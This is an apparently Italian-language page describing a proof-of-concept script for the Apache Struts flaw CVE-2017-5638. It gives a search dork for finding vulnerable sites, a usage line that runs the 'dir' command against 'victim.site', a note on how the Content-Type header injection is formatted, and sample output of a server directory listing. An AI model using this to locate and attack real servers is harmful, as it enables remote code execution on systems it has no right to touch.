
Codice PoC di esempio per CVE-2017-5638 | Exploit di Apache Struts
Codice PoC di esempio per CVE-2017-5638 | Exploit Apache Struts | DORK: ext:action
USO: python struts.py https://victim.site dir
Lo script Python iniziale che è stato pubblicato non formattava correttamente l'header Content-Type. Ho ricodificato l'header Content-Type per formattare correttamente Content-Type:%20{Exploit}. Ho anche aggiunto logging e Requests, quindi ho scaricato le proprietà dell'oggetto su stdout.
ESEMPIO DI OUTPUT
Check for CVE-2017-5638 by XSS.Cx
Volume in drive D has no label. Volume Serial Number is 2A7B-A245 Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0